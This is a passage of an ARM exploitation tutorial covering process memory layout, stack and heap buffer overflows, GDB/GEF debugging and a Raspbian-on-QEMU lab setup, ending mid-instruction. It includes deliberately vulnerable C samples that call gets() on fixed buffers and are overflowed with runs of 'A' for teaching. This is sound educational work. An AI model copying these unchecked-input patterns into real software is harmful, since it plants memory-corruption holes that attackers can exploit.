0xb6fff000 0xb7000000 0x00000000 r-x [sigpage]
0xbefdf000 0xbf000000 0x00000000 rw- [stack] <---- STACK
0xffff0000 0xffff1000 0x00000000 r-x [vectors]

The Heap section in the vmmap command output appears only after some Heap related function has been used. In this case we see the malloc function being used to create a buffer in the Heap region. So if you want to try this out, you need to debug a program that makes a malloc call (you can find some examples on this page, scroll down or use the find function).

Additionally, in Linux we can inspect the process’ memory layout by accessing a process-specific “file”:

azeria@labs:~/exp $ ps aux | grep program
azeria   31661 12.3 12.1  38680 30756 pts/0    S+   23:04   0:10 gdb program
azeria   31665  0.1  0.2   1712   748 pts/0    t    23:04   0:00 /home/azeria/exp/program
azeria   31670  0.0  0.7   4180  1876 pts/1    S+   23:05   0:00 grep --color=auto program
azeria@labs:~/exp $ cat /proc/31665/maps
00010000-00011000 r-xp 00000000 08:02 274721     /home/azeria/exp/program
00020000-00021000 rw-p 00000000 08:02 274721     /home/azeria/exp/program
00021000-00042000 rw-p 00000000 00:00 0          [heap]
b6e74000-b6f9f000 r-xp 00000000 08:02 132394     /lib/arm-linux-gnueabihf/libc-2.19.so
b6f9f000-b6faf000 ---p 0012b000 08:02 132394     /lib/arm-linux-gnueabihf/libc-2.19.so
b6faf000-b6fb1000 r--p 0012b000 08:02 132394     /lib/arm-linux-gnueabihf/libc-2.19.so
b6fb1000-b6fb2000 rw-p 0012d000 08:02 132394     /lib/arm-linux-gnueabihf/libc-2.19.so
b6fb2000-b6fb5000 rw-p 00000000 00:00 0
b6fcc000-b6fec000 r-xp 00000000 08:02 132358     /lib/arm-linux-gnueabihf/ld-2.19.so
b6ffa000-b6ffb000 rw-p 00000000 00:00 0
b6ffb000-b6ffc000 r--p 0001f000 08:02 132358     /lib/arm-linux-gnueabihf/ld-2.19.so
b6ffc000-b6ffd000 rw-p 00020000 08:02 132358     /lib/arm-linux-gnueabihf/ld-2.19.so
b6ffd000-b6fff000 rw-p 00000000 00:00 0
b6fff000-b7000000 r-xp 00000000 00:00 0          [sigpage]
befdf000-bf000000 rw-p 00000000 00:00 0          [stack]
ffff0000-ffff1000 r-xp 00000000 00:00 0          [vectors]
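
Each line of that “file” has a fixed layout (address range, permissions, offset, device, inode, path), so it is easy to process programmatically. The following sketch parses the address range and the permission field of a single line. The struct and function names are hypothetical and chosen only for this illustration.

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical container for the fields we care about. */
struct map_entry {
    unsigned long start;
    unsigned long end;
    char perms[5];        /* e.g. "r-xp" plus the terminating NUL */
};

/* Parse the address range and permission field of one maps line.
 * Returns 1 on success, 0 if the line does not have the expected format. */
int parse_maps_line(const char *line, struct map_entry *out)
{
    assert(line != NULL && out != NULL);
    return sscanf(line, "%lx-%lx %4s",
                  &out->start, &out->end, out->perms) == 3;
}

/* A region that is both writable and executable is the interesting case
 * from an attacker's point of view. */
int is_writable_and_executable(const struct map_entry *e)
{
    return e->perms[1] == 'w' && e->perms[2] == 'x';
}
```

Feeding it the [heap] line from the output above yields start 0x21000, end 0x42000 and the permissions rw-p, which is readable and writable but not executable.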

Most programs are compiled in a way that they use shared libraries. Those libraries are not part of the program image (even though it is possible to include them via static linking) and therefore have to be referenced (included) dynamically. As a result, we see the libraries (libc, ld, etc.) being loaded in the memory layout of a process. Roughly speaking, the shared libraries are loaded somewhere in the memory (outside of process’ control) and our program just creates virtual “links” to that memory region. This way we save memory without the need to load the same library in every instance of a program.

INTRODUCTION INTO MEMORY CORRUPTIONS

A memory corruption is a type of software bug that allows memory to be modified in a way that was not intended by the programmer. In most cases, this condition can be exploited to execute arbitrary code, disable security mechanisms, etc. This is done by crafting and injecting a payload which alters certain memory sections of a running program. The following list contains the most common memory corruption types/vulnerabilities:

  1. Buffer Overflows
    • Stack Overflow
    • Heap Overflow
  2. Dangling Pointer (Use-after-free)
  3. Format String

In this chapter we will get familiar with the basics of Buffer Overflow memory corruption vulnerabilities (the remaining ones will be covered in the next chapter). In the examples we are about to cover, we will see that the main cause of memory corruption vulnerabilities is improper validation of user input, sometimes combined with a logical flaw. For a program, the input (or a malicious payload) might come in the form of a username, a file to be opened, a network packet, etc. and can often be influenced by the user. If the programmer did not put safety measures in place for potentially harmful user input, the target program will often be subject to some kind of memory-related issue.

BUFFER OVERFLOWS

Buffer overflows are one of the most widespread memory corruption classes and are usually caused by a programming mistake which allows the user to supply more data than the destination variable (buffer) can hold. This happens, for example, when vulnerable functions such as gets, strcpy, memcpy or others are used along with data supplied by the user. These functions do not check whether the user’s data fits into the destination, which can result in writing past (overflowing) the allocated buffer. To get a better understanding, we will look into the basics of Stack and Heap based buffer overflows.
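
For contrast, this is roughly what a length-checked read looks like. The sketch below is not taken from the tutorial; it assumes the standard fgets function as a bounded replacement for gets, and the wrapper name read_line_bounded is hypothetical.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical bounded alternative to gets(): store at most cap - 1
 * characters of one line from in and always NUL-terminate buf.
 * Returns the number of characters stored, or -1 on EOF or error. */
long read_line_bounded(FILE *in, char *buf, size_t cap)
{
    assert(in != NULL && buf != NULL && cap > 0);
    if (fgets(buf, (int)cap, in) == NULL)
        return -1;
    buf[strcspn(buf, "\n")] = '\0';   /* drop the newline if it fit */
    return (long)strlen(buf);
}
```

With an 8-byte buffer and 16 A’s as input, only 7 characters plus the terminating null byte are stored, so nothing beyond the buffer is touched. The vulnerable examples that follow deliberately do not do this.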

Stack Overflow

Stack overflow, as the name suggests, is a memory corruption affecting the Stack. While in most cases arbitrary corruption of the Stack would most likely result in a program’s crash, a carefully crafted Stack buffer overflow can lead to arbitrary code execution. The following picture shows an abstract overview of how the Stack can get corrupted.

As you can see in the picture above, the Stack frame (a small part of the whole Stack dedicated to a specific function) can have various components: user data, previous Frame Pointer, previous Link Register, etc. If the user provides too much data for a controlled variable, the FP and LR fields might get overwritten. This breaks the execution of the program, because the user corrupts the address to which the application will return/jump after the current function is finished.

To see what this looks like in practice we can use this example:

/*azeria@labs:~/exp $ gcc stack.c -o stack*/
#include <stdio.h>

int main(int argc, char **argv)
{
 char buffer[8];   //8-byte buffer placed on the Stack
 gets(buffer);     //no length check: more than 7 characters overflow the buffer
}

Our sample program uses the variable “buffer”, with the length of 8 characters, and a function “gets” for user’s input, which simply sets the value of the variable “buffer” to whatever input the user provides. The disassembled code of this program looks like the following:

Here we suspect that a memory corruption could happen right after the function “gets” is completed. To investigate this, we place a break-point right after the branch instruction that calls the “gets” function – in our case, at address 0x0001043c. To reduce the noise we configure GEF’s layout to show us only the code and the Stack (see the command in the picture below). Once the break-point is set, we proceed with the program and provide 7 A’s as the user’s input (we use 7 A’s, because a null-byte will be automatically appended by function “gets”).

When we investigate the Stack of our example we see (image above) that the Stack frame is not corrupted. This is because the input supplied by the user fits in the expected 8 byte buffer and the previous FP and LR values within the Stack frame are not corrupted. Now let’s provide 16 A’s and see what happens.

In the second example we see (image above) that when we provide too much data for the function “gets”, it does not stop at the boundaries of the target buffer and keeps writing “down the Stack”. This causes our previous FP and LR values to be corrupted. When we continue running the program, it crashes (causes a “Segmentation fault”), because during the epilogue of the current function the previous values of FP and LR are “popped” off the Stack into the R11 and PC registers, forcing the program to jump to address 0x41414140 (the value loaded is 0x41414141, but its least-significant bit is set, which triggers a switch to Thumb mode and is cleared from the PC), which in this case is an illegal address. The picture below shows us the values of the registers (take a look at $pc) at the time of the crash.
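
The step from 0x41414141 to 0x41414140 is plain bit arithmetic, sketched below. The function names are hypothetical, and the sketch covers only the case discussed here, in which bit 0 of the loaded value is set.

```c
#include <assert.h>
#include <stdint.h>

/* Bit 0 of a value loaded into PC by an interworking instruction such
 * as pop {r11, pc} selects the instruction set: 1 means Thumb. */
int selects_thumb(uint32_t loaded)
{
    return (int)(loaded & 1u);
}

/* Address at which execution continues in the Thumb case: bit 0 only
 * carries the mode and is cleared from the resulting PC. */
uint32_t resulting_pc(uint32_t loaded)
{
    uint32_t pc = loaded & ~UINT32_C(1);

    assert((pc & 1u) == 0);   /* a Thumb PC is always halfword aligned */
    return pc;
}
```

For the overwritten return address, selects_thumb(0x41414141) is 1 and resulting_pc(0x41414141) is 0x41414140, the value visible in $pc at the time of the crash.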

Heap Overflow

First of all, Heap is a more complicated memory location, mainly because of the way it is managed. To keep things simple, we stick with the fact that every object placed in the Heap memory section is “packed” into a “chunk” having two parts: header and user data (which sometimes the user controls fully). In the Heap’s case, the memory corruption happens when the user is able to write more data than is expected. In that case, the corruption might happen within the chunk’s boundaries (intra-chunk Heap overflow), or across the boundaries of two (or more) chunks (inter-chunk Heap overflow). To put things in perspective, let’s take a look at the following illustration.

As shown in the illustration above, the intra-chunk heap overflow happens when the user has the ability to supply more data to u_data_1 and cross the boundary between u_data_1 and u_data_2. In this way the fields/properties of the current object get corrupted. If the user supplies more data than the current Heap chunk can accommodate, then the overflow becomes inter-chunk and results in a corruption of the adjacent chunk(s).

Intra-chunk Heap overflow

To illustrate what an intra-chunk Heap overflow looks like in practice we can use the following example and compile it with “-O” (optimization flag) to get a smaller binary that is easier to look through.

/*azeria@labs:~/exp $ gcc intra_chunk.c -o intra_chunk -O*/
#include "stdlib.h"
#include "stdio.h"

struct u_data                                          //object model: 8 bytes for name, 4 bytes for number
{
 char name[8];
 int number;
};

int main ( int argc, char* argv[] )
{
 struct u_data* objA = malloc(sizeof(struct u_data)); //create object in Heap

 objA->number = 1234;                                 //set the number of our object to a static value
 gets(objA->name);                                    //set name of our object according to user's input

 if(objA->number == 1234)                             //check if static value is intact
 {
  puts("Memory valid");
 }
 else                                                 //proceed here in case the static value gets corrupted
 {
  puts("Memory corrupted");
 }
}

The program above does the following:

  1. Defines a data structure (u_data) with two fields
  2. Creates an object (in the Heap memory region) of type u_data
  3. Assigns a static value to the number’s field of the object
  4. Prompts user to supply a value for the name’s field of the object
  5. Prints a string depending on the value of the number’s field

So in this case we also suspect that the corruption might happen after the function “gets”. We disassemble the target program’s main function to get the address for a break-point.

In this case we set the break-point at address 0x00010498 – right after the function “gets” is completed. We configure GEF to show us the code only. We then run the program and provide 7 A’s as a user input.

Once the break-point is hit, we quickly look up the memory layout of our program to find where our Heap is. We use the vmmap command and see that our Heap starts at the address 0x00021000. Given that our object (objA) is the first and only one created by the program, we start analyzing the Heap right from the beginning.

The picture above shows us a detailed breakdown of the Heap’s chunk associated with our object. The chunk has a header (8 bytes) and the user’s data section (12 bytes) storing our object. We see that the name field properly stores the supplied string of 7 A’s, terminated by a null-byte. The number field stores 0x4d2 (1234 in decimal). So far so good. Let’s repeat these steps, but in this case enter 8 A’s.

While examining the Heap this time we see that the number’s field got corrupted (it’s now equal to 0x400 instead of 0x4d2). The null-byte terminator overwrote one byte of the number’s field: its least-significant byte, which is stored first on this little-endian system. This results in an intra-chunk Heap memory corruption. Effects of such a corruption in this case are not devastating, but visible. Logically, the else statement in the code should never be reached as the number’s field is intended to be static. However, the memory corruption we just observed makes it possible to reach that part of the code. This can be easily confirmed by the example below.
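
The arithmetic behind 0x400 can also be reproduced without a debugger. The sketch below does not call gets; it simulates its effect by copying the A’s plus the terminating null byte to the start of the object. It assumes a little-endian machine, a 4-byte int and no padding between the two fields, and the function name number_after_input is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

struct u_data {           /* same object model as in intra_chunk.c */
    char name[8];
    int number;
};

/* Simulate gets() receiving count 'A' characters (count <= 8 here):
 * the characters and the terminating null byte are written starting
 * at the name field. Returns the value of number afterwards. */
int number_after_input(size_t count)
{
    struct u_data obj;
    unsigned char input[9];

    assert(count <= 8);
    assert(sizeof(int) == 4);                       /* assumption */
    assert(offsetof(struct u_data, number) == 8);   /* assumption: no padding */

    memset(input, 'A', count);
    input[count] = '\0';

    memset(&obj, 0, sizeof obj);
    obj.number = 1234;                  /* 0x4d2 */
    memcpy(&obj, input, count + 1);     /* copy into the object as a whole */
    return obj.number;
}
```

With 7 A’s the null byte still lands inside name and the function returns 1234. With 8 A’s the null byte replaces the 0xd2 byte of 0x000004d2, and on a little-endian machine the function returns 0x400.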

Inter-chunk Heap overflow

To illustrate what an inter-chunk Heap overflow looks like in practice we can use the following example, which we now compile without the optimization flag.

/*azeria@labs:~/exp $ gcc inter_chunk.c -o inter_chunk*/
#include "stdlib.h"
#include "stdio.h"

int main ( int argc, char* argv[] )
{
 char *some_string = malloc(8);  //create some_string "object" in Heap
 int *some_number = malloc(4);   //create some_number "object" in Heap

 *some_number = 1234;            //assign some_number a static value
 gets(some_string);              //ask user for input for some_string

 if(*some_number == 1234)        //check if static value (of some_number) is intact
 {
  puts("Memory valid");
 }
 else                            //proceed here in case the static some_number gets corrupted
 {
  puts("Memory corrupted");
 }
}

The process here is similar to the previous ones: set a break-point after function “gets”, run the program, supply 7 A’s, investigate Heap.

Once the break-point is hit, we examine the Heap. In this case, we have two chunks. We see (image below) that their structure is intact: some_string is within its boundaries, and some_number is equal to 0x4d2.

Now, let’s supply 16 A’s and see what happens.

As you might have guessed, providing too much input causes an overflow that corrupts the adjacent chunk. In this case we see that our user input corrupted the header and the first byte of the some_number field. Here again, by corrupting some_number we manage to reach the code section which logically should never be reached.
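
The byte counting behind this result can be modelled with a plain array. This is a toy model, not real allocator behaviour: the layout constants (8-byte headers, 8 bytes of user data per chunk) follow the description above, the function name model_overflow is hypothetical, and a little-endian machine is assumed.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

enum { HEADER = 8, STRING_DATA = 8, NUMBER_DATA = 8 };

/* Toy model of two adjacent chunks laid out as
 * [header][some_string][header][some_number].
 * Writes count 'A' characters plus a null byte starting at some_string
 * and returns the value of some_number afterwards. */
uint32_t model_overflow(size_t count)
{
    unsigned char heap[HEADER + STRING_DATA + HEADER + NUMBER_DATA] = {0};
    unsigned char *some_string = heap + HEADER;
    unsigned char *some_number = some_string + STRING_DATA + HEADER;
    uint32_t value = 1234;

    assert(count + 1 <= sizeof heap - HEADER);   /* stay inside the model */
    memcpy(some_number, &value, sizeof value);

    memset(some_string, 'A', count);             /* the unchecked "gets" */
    some_string[count] = '\0';

    memcpy(&value, some_number, sizeof value);
    return value;
}
```

In this model 7 A’s leave some_number at 1234, while 16 A’s fill the 8 bytes of some_string, overwrite the 8-byte header of the next chunk, and let the null byte clear the first byte of some_number, which gives 0x400.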

SUMMARY

In this part of the tutorial we got familiar with the process memory layout and the basics of Stack and Heap related memory corruptions. In the next part of this tutorial series we will cover other memory corruptions: Dangling pointer and Format String. Once we cover the most common types of memory corruptions, we will be ready for learning how to write working exploits.

ARM DEBUGGING WITH GDB

DEBUGGING WITH GDB

This is a very brief introduction to compiling ARM binaries and basic debugging with GDB. As you work through the tutorials, you might want to experiment with ARM assembly on your own. In that case, you either need a spare ARM device, or you can set up your own lab environment in a VM by following the steps in this short How-To.

You can use the following code from Stack and Functions, to get familiar with basic debugging with GDB.

.section .text
.global _start

_start:
    push {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    add r11, sp, #0   /* Setting up the bottom of the stack frame */
    sub sp, sp, #16   /* End of the prologue. Allocating some buffer on the stack */
    mov r0, #1        /* setting up local variables (a=1). This also serves as setting up the first parameter for the max function */
    mov r1, #2        /* setting up local variables (b=2). This also serves as setting up the second parameter for the max function */
    bl max            /* Calling/branching to function max */
    sub sp, r11, #0   /* Start of the epilogue. Readjusting the Stack Pointer */
    pop {r11, pc}     /* End of the epilogue. Restoring Frame pointer from the stack, jumping to previously saved LR via direct load into PC */

max:
    push {r11}        /* Start of the prologue. Saving Frame Pointer onto the stack */
    add r11, sp, #0   /* Setting up the bottom of the stack frame */
    sub sp, sp, #12   /* End of the prologue. Allocating some buffer on the stack */
    cmp r0, r1        /* Implementation of if(a<b) */
    movlt r0, r1      /* if r0 was lower than r1, store r1 into r0 */
    add sp, r11, #0   /* Start of the epilogue. Readjusting the Stack Pointer */
    pop {r11}         /* restoring frame pointer */
    bx lr             /* End of the epilogue. Jumping back to main via LR register */
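
For orientation, the logic of this listing corresponds roughly to the following C. It is a sketch for comparison, not the source the assembly was generated from; the function name start is a hypothetical stand-in for _start.

```c
#include <assert.h>

/* C counterpart of the max routine. */
int max(int a, int b)
{
    if (a < b)      /* cmp r0, r1 */
        a = b;      /* movlt r0, r1 */
    return a;       /* the result is returned in r0 */
}

/* Mirrors _start, which calls max with a = 1 and b = 2. */
int start(void)
{
    int result = max(1, 2);

    assert(result == 2);
    return result;
}
```

Keeping this picture in mind makes it easier to follow the register values while stepping through the program in GDB: after bl max returns, r0 holds 2.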

Personally, I prefer using GEF as a GDB extension. It gives me a better overview and useful features. You can try it out here: GEF – GDB Enhanced Features.

Save the code above in a file called max.s, then assemble and link it with the following commands:

$ as max.s -o max.o
$ ld max.o -o max

The debugger is a powerful tool that can:

  • Load a memory dump after a crash (post-mortem debugging)
  • Attach to a running process (used for server processes)
  • Launch a program and debug it

Launch GDB against either a binary, a core file, or a Process ID:

  • Attach to a process: $ gdb -pid $(pidof <process>)
  • Debug a binary: $ gdb ./file
  • Inspect a core (crash) file: $ gdb -c ./core.3243

$ gdb max

If you installed GEF, it drops you at the gef> prompt.

This is how you get help:

  • (gdb) h
  • (gdb) apropos <search-term>

gef> apropos registers
collect -- Specify one or more data items to be collected at a tracepoint
core-file -- Use FILE as core dump for examining memory and registers
info all-registers -- List of all registers and their contents
info r -- List of integer registers and their contents
info registers -- List of integer registers and their contents
maintenance print cooked-registers -- Print the internal register configuration including cooked values
maintenance print raw-registers -- Print the internal register configuration including raw values
maintenance print registers -- Print the internal register configuration
maintenance print remote-registers -- Print the internal register configuration including each register's
p -- Print value of expression EXP
print -- Print value of expression EXP
registers -- Display full details on one
set may-write-registers -- Set permission to write into registers
set observer -- Set whether gdb controls the inferior in observer mode
show may-write-registers -- Show permission to write into registers
show observer -- Show whether gdb controls the inferior in observer mode
tui reg float -- Display only floating point registers
tui reg general -- Display only general registers
tui reg system -- Display only system registers

Breakpoint commands:

  • break (or just b) <function-name>
  • break <line-number>
  • break filename:function
  • break filename:line-number
  • break *<address>
  • break +<offset>
  • break -<offset>
  • tbreak (set a temporary breakpoint)
  • del <number>  (delete breakpoint number x)
  • delete (delete all breakpoints)
  • delete <range> (delete breakpoint ranges)
  • disable/enable <breakpoint-number-or-range> (does not delete breakpoints, just enables/disables them)
  • continue (or just c) – (continue executing until next breakpoint)
  • continue <number> (continue but ignore current breakpoint number times. Useful for breakpoints within a loop.)
  • finish (continue to end of function)

gef> break _start
gef> info break
Num Type Disp Enb Address What
1 breakpoint keep y 0x00008054 <_start>
 breakpoint already hit 1 time
gef> del 1
gef> break *0x0000805c
Breakpoint 2 at 0x805c
gef> break _start

This deletes the first breakpoint and sets a breakpoint at the specified memory address. When you run the program, it will break at this exact location. If you did not delete the first breakpoint and just set a new one and ran the program, it would break at the first breakpoint.

Start and Stop:

  • Start program execution from beginning of the program
    • run
    • r
    • run <command-line-argument>
  • Stop program execution
    • kill
  • Exit GDB debugger
    • quit
    • q

gef> run

Now that our program broke exactly where we wanted, it’s time to examine the memory. The command “x” displays memory contents in various formats.

Syntax: x/<count><format><unit>

FORMAT              UNIT
x – hexadecimal     b – bytes
d – decimal         h – half words (2 bytes)
i – instructions    w – words (4 bytes)
t – binary (two)    g – giant words (8 bytes)
o – octal
u – unsigned
s – string
c – character

gef> x/10i $pc
=> 0x8054 <_start>: push {r11, lr}
 0x8058 <_start+4>: add r11, sp, #0
 0x805c <_start+8>: sub sp, sp, #16
 0x8060 <_start+12>: mov r0, #1
 0x8064 <_start+16>: mov r1, #2
 0x8068 <_start+20>: bl 0x8074 <max>
 0x806c <_start+24>: sub sp, r11, #0
 0x8070 <_start+28>: pop {r11, pc}
 0x8074 <max>: push {r11}
 0x8078 <max+4>: add r11, sp, #0
gef> x/16xw $pc
0x8068 <_start+20>: 0xeb000001  0xe24bd000  0xe8bd8800  0xe92d0800
0x8078 <max+4>:     0xe28db000  0xe24dd00c  0xe1500001  0xb1a00001
0x8088 <max+20>:    0xe28bd000  0xe8bd0800  0xe12fff1e  0x00001741
0x8098:             0x61656100  0x01006962  0x0000000d  0x01080206
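
The first word of this dump, 0xeb000001, is the encoding of the bl instruction at 0x8068, and its branch target can be recomputed by hand. The sketch below shows the calculation for ARM-state B/BL instructions; the function name arm_branch_target is hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Decode the target of an ARM-state B/BL instruction word located at
 * addr. The low 24 bits hold a signed word offset that is relative to
 * addr + 8, the value PC reads as while the instruction executes. */
uint32_t arm_branch_target(uint32_t addr, uint32_t insn)
{
    assert(((insn >> 25) & 0x7u) == 0x5u);   /* bits 27..25 = 101: B or BL */

    uint32_t imm24 = insn & 0x00ffffffu;
    uint32_t offset = imm24 << 2;            /* word offset to byte offset */

    if (imm24 & 0x00800000u)
        offset |= 0xfc000000u;               /* sign-extend the 26-bit offset */
    return addr + 8u + offset;               /* wraps modulo 2^32 */
}
```

For the word above, the offset field is 1, so the target is 0x8068 + 8 + 4 = 0x8074, which is exactly the address of max shown in the disassembly.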

Commands for stepping through the code:

  • Step to the next source line (step, s) or the next instruction (stepi). Will step into a function
    • stepi
    • s
    • step <number-of-steps-to-perform>
  • Execute the next source line (next, n) or the next instruction (nexti). Will not enter functions
    • nexti
    • n
    • next <number>
  • Continue processing until you reach a specified line number, function name, address, filename:function, or filename:line-number
    • until
    • until <line-number>
  • Show current line number and which function you are in
    • where

gef> nexti 5
...
0x8068 <_start+20> bl 0x8074 <max> <- $pc
0x806c <_start+24> sub sp, r11, #0
0x8070 <_start+28> pop {r11, pc}
0x8074 <max> push {r11}
0x8078 <max+4> add r11, sp, #0
0x807c <max+8> sub sp, sp, #12
0x8080 <max+12> cmp r0, r1
0x8084 <max+16> movlt r0, r1
0x8088 <max+20> add sp, r11, #0

Examine the registers with info registers or i r

gef> info registers
r0     0x1     1
r1     0x2     2
r2     0x0     0
r3     0x0     0
r4     0x0     0
r5     0x0     0
r6     0x0     0
r7     0x0     0
r8     0x0     0
r9     0x0     0
r10    0x0     0
r11    0xbefff7e8 3204446184
r12    0x0     0
sp     0xbefff7d8 0xbefff7d8
lr     0x0     0
pc     0x8068  0x8068 <_start+20>
cpsr   0x10    16

The command “info registers” gives you the current register state. We can see the general purpose registers r0-r12, and the special purpose registers SP, LR, and PC, including the status register CPSR. The first four arguments to a function are generally stored in r0-r3. In this case, we manually moved values to r0 and r1.

Show process memory map:

gef> info proc map
process 10225
Mapped address spaces:

 Start Addr   End Addr    Size     Offset objfile
     0x8000     0x9000  0x1000          0   /home/pi/lab/max
 0xb6fff000 0xb7000000  0x1000          0          [sigpage]
 0xbefdf000 0xbf000000 0x21000          0            [stack]
 0xffff0000 0xffff1000  0x1000          0          [vectors]

With the command “disassemble” we look through the disassembly output of the function max.

gef> disassemble max
 Dump of assembler code for function max:
 0x00008074 <+0>: push {r11}
 0x00008078 <+4>: add r11, sp, #0
 0x0000807c <+8>: sub sp, sp, #12
 0x00008080 <+12>: cmp r0, r1
 0x00008084 <+16>: movlt r0, r1
 0x00008088 <+20>: add sp, r11, #0
 0x0000808c <+24>: pop {r11}
 0x00008090 <+28>: bx lr
 End of assembler dump.

GEF specific commands (more commands can be viewed using the command “gef”):

  • Dump all sections of all loaded ELF images in process memory
    • xfiles
  • Enhanced version of proc map, includes RWX attributes in mapped pages
    • vmmap
  • Memory attributes at a given address
    • xinfo
  • Inspect compiler level protection built into the running binary
    • checksec
gef> xfiles
     Start        End  Name File
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
gef> vmmap
     Start        End     Offset Perm Path
0x00008000 0x00009000 0x00000000 r-x /home/pi/lab/max
0xb6fff000 0xb7000000 0x00000000 r-x [sigpage]
0xbefdf000 0xbf000000 0x00000000 rwx [stack]
0xffff0000 0xffff1000 0x00000000 r-x [vectors]
gef> xinfo 0xbefff7e8
----------------------------------------[ xinfo: 0xbefff7e8 ]----------------------------------------
Found 0xbefff7e8
Page: 0xbefdf000 -> 0xbf000000 (size=0x21000)
Permissions: rwx
Pathname: [stack]
Offset (from page): +0x207e8
Inode: 0
gef> checksec
[+] checksec for '/home/pi/lab/max'
Canary:                  No
NX Support:              Yes
PIE Support:             No
RPATH:                   No
RUNPATH:                 No
Partial RelRO:           No
Full RelRO:              No

TROUBLESHOOTING

To make debugging with GDB more efficient it is useful to know where certain branches/jumps will take us. Certain (newer) versions of GDB resolve the addresses of a branch instruction and show us the name of the target function. For example, the following output of GDB lacks this feature:

...
0x000104f8 <+72>: bl 0x10334
0x000104fc <+76>: mov r0, #8
0x00010500 <+80>: bl 0x1034c
0x00010504 <+84>: mov r3, r0
...

And this is the output of GDB (native, without gef) which has the feature I’m talking about:

0x000104f8 <+72>:    bl      0x10334 <free@plt>
0x000104fc <+76>:    mov     r0, #8
0x00010500 <+80>:    bl      0x1034c <malloc@plt>
0x00010504 <+84>:    mov     r3, r0

If you don’t have this feature in your GDB, you can either update the Linux sources (and hope that they already have a newer GDB in their repositories) or compile a newer GDB by yourself. If you choose to compile the GDB by yourself, you can use the following commands:

cd /tmp
wget https://ftp.gnu.org/gnu/gdb/gdb-7.12.tar.gz
tar vxzf gdb-7.12.tar.gz
sudo apt-get update
sudo apt-get install libreadline-dev python-dev texinfo -y
cd gdb-7.12
./configure --prefix=/usr --with-system-readline --with-python && make -j4
sudo make -j4 -C gdb/ install
gdb --version

I used the commands provided above to download, compile and run GDB on Raspbian (jessie) without problems. These commands will also replace the previous version of your GDB. If you don’t want that, skip the command that ends with the word install. Moreover, I did this while emulating Raspbian in QEMU, so it took a long time (hours) because of the limited CPU resources in the emulated environment. I used GDB version 7.12, but you would most likely succeed with a newer version as well (other versions are listed at https://ftp.gnu.org/gnu/gdb/).

RASPBERRY PI ON QEMU

Let’s start setting up a Lab VM. We will use Ubuntu and emulate our desired ARM versions inside of it.

First, get the latest Ubuntu version and run it in a VM.

For the QEMU emulation you will need the following:

  1. A Raspbian Image: http://downloads.raspberrypi.org/raspbian/images/raspbian-2017-04-10/ (other versions might work, but Jessie is recommended)
  2. Latest qemu kernel: https://github.com/dhruvvyas90/qemu-rpi-kernel

Inside your Ubuntu VM, create a new folder:

$ mkdir ~/qemu_vms/

Download and place the Raspbian Jessie image to ~/qemu_vms/.

Download and place the qemu-kernel to ~/qemu_vms/.

$ sudo apt-get install qemu-system
$ unzip <image-file>.zip
$ fdisk -l <image-file>

You should see something like this:

Disk 2017-03-02-raspbian-jessie.img: 4.1 GiB, 4393533440 bytes, 8581120 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x432b3940

Device                          Boot  Start     End Sectors Size Id Type
2017-03-02-raspbian-jessie.img1        8192  137215  129024  63M  c W95 FAT32 (LBA)
2017-03-02-raspbian-jessie.img2      137216 8581119 8443904   4G 83 Linux

You see that the filesystem (.img2) starts at sector 137216. Now take that value and multiply it by 512, in this case it’s 512 * 137216 = 70254592 bytes. Use this value as an offset in the following command:

$ sudo mkdir /mnt/raspbian
$ sudo mount -v -o offset=70254592 -t ext4 ~/qemu_vms/<your-img-file.img> /mnt/raspbian
$ sudo nano /mnt/raspbian/etc/ld.so.preload

Comment out every entry in that file with ‘#’, save and exit with Ctrl-x » Y.

$ sudo nano /mnt/raspbian/etc/fstab

If you see anything with mmcblk0 in fstab, then:

  1. Replace the first entry containing /dev/mmcblk0p1 with /dev/sda1
  2. Replace the second entry containing /dev/mmcblk0p2 with /dev/sda2, save and exit.
$ cd ~
$ sudo umount /mnt/raspbian
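The offset passed to mount earlier is simply the partition's start sector multiplied by the sector size. A small sketch of that arithmetic, with the function and constant names chosen here for illustration and the values taken from the fdisk output above:

```python
SECTOR_SIZE = 512  # bytes, from the "Units: sectors of 1 * 512" line


def partition_offset(start_sector: int, sector_size: int = SECTOR_SIZE) -> int:
    """Return the byte offset of a partition inside a raw disk image."""
    return start_sector * sector_size


# Start sector of the Linux partition (.img2) in the fdisk listing.
print(partition_offset(137216))
```

If your image reports a different start sector, pass that number instead and use the result as the offset= value.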

Now you can emulate it on Qemu by using the following command:

$ qemu-system-arm -kernel ~/qemu_vms/<your-kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/<your-jessie-image.img> -redir tcp:5022::22 -no-reboot

If you see the GUI of the Raspbian OS, you need to get into the terminal. Use the Win key to open the menu, then navigate with the arrow keys until you find the Terminal application, as shown below.

From the terminal, you need to start the SSH service so that you can access it from your host system (the one from which you launched the qemu).

Now you can SSH into it from your host system with (default password – raspberry):

$ ssh pi@127.0.0.1 -p 5022

For a more advanced network setup see the “Advanced Networking” paragraph below.

Troubleshooting

If SSH doesn’t start in your emulator at startup by default, you can change that inside your Pi terminal with:

$ sudo update-rc.d ssh enable

If your emulated Pi starts the GUI and you want to make it start in console mode at startup, use the following command inside your Pi terminal:

$ sudo raspi-config
>Select 3 – Boot Options
>Select B1 – Desktop / CLI
>Select B2 – Console Autologin

If your mouse doesn’t move in the emulated Pi, press the <Windows> key, arrow down to Accessories, arrow right, arrow down to Terminal, and press Enter.

Resizing the Raspbian image

Once you are done with the setup, you are left with a total of 3.9 GB on your image, which is full. To enlarge your Raspbian image, follow these steps on your Ubuntu machine:

Create a copy of your existing image:

